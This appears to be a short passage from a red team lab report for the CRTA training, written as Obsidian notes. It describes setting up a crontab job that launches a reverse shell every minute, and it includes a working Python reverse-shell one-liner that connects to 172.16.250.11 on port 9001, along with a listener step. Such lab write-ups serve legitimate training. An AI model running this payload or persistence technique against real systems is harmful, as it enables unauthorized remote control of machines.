GalileoQ/ObsidianGIT/CRTA/Red Team Report (CRTA).md

 First we are going to create a Crontab task that executes a reverse Shell every 1 minute
 ![[Pasted image 20250512163457.png]]

+We use this reverse Shell written in Python
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.250.11",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
 ```

+And finally we will be listening to the port we have selected.
+In this case the port 9001
 ![[Pasted image 20250512162449.png]]

 credenciales